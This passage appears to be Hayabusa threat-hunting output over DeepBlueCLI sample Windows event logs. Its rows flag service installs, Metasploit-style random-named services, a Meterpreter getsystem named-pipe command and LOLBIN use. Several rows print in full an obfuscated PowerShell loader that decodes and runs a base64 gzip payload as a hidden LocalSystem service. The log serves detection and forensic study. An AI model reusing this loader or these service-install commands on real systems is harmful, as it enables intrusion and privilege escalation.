4222016-08-19 04:59:33.224 +09:00IE10Win77045infoNew Service InstalledName: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4232016-08-19 05:00:43.879 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4242016-08-19 05:00:43.910 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4252016-08-19 05:03:18.175 +09:00IE10Win77045highPersisSuspicious Service InstalledSvc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4262016-08-19 05:03:18.175 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfagrules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4272016-08-19 05:03:18.175 +09:00IE10Win77045infoNew Service InstalledName: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4282016-08-19 05:03:18.175 +09:00IE10Win74688mediumSuspicious Cmd Line_Possible Meterpreter getsystemCmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4292016-08-19 05:03:18.175 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4302016-08-19 05:04:19.379 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4312016-08-19 05:04:19.379 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4322016-08-19 05:04:19.379 +09:00IE10Win77045infoNew Service InstalledName: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4332016-08-19 05:08:53.832 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4342016-08-19 05:10:06.597 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4352016-08-19 05:10:06.597 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4362016-08-19 05:10:06.597 +09:00IE10Win77045infoNew Service InstalledName: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4372016-08-19 05:11:24.391 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4382016-08-19 05:11:24.391 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4392016-08-19 05:11:24.391 +09:00IE10Win77045infoNew Service InstalledName: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4402016-08-19 05:12:53.344 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4412016-08-19 05:12:53.344 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4422016-08-19 05:12:53.344 +09:00IE10Win77045infoNew Service InstalledName: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4432016-08-19 05:14:12.922 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4442016-08-19 05:14:12.922 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4452016-08-19 05:14:12.922 +09:00IE10Win77045infoNew Service InstalledName: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4462016-08-19 05:16:40.574 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4472016-08-19 05:16:40.574 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4482016-08-19 05:16:40.605 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceafrules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4492016-08-19 05:22:36.074 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4502016-08-19 05:22:36.074 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4512016-08-19 05:22:36.074 +09:00IE10Win77045infoNew Service InstalledName: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4522016-08-19 05:24:48.043 +09:00IE10Win77045mediumPersisPossible Metasploit Service InstalledSvc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4532016-08-19 05:24:48.043 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exerules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4542016-08-19 05:24:48.043 +09:00IE10Win77045infoNew Service InstalledName: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4552016-08-19 05:40:21.230 +09:00IE10Win77045highPersisSuspicious Service InstalledSvc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4562016-08-19 05:40:21.230 +09:00IE10Win77045highPersisMalicious Service Possibly InstalledSvc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4572016-08-19 05:40:21.230 +09:00IE10Win77045infoNew Service InstalledName: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4582016-08-19 05:40:21.261 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 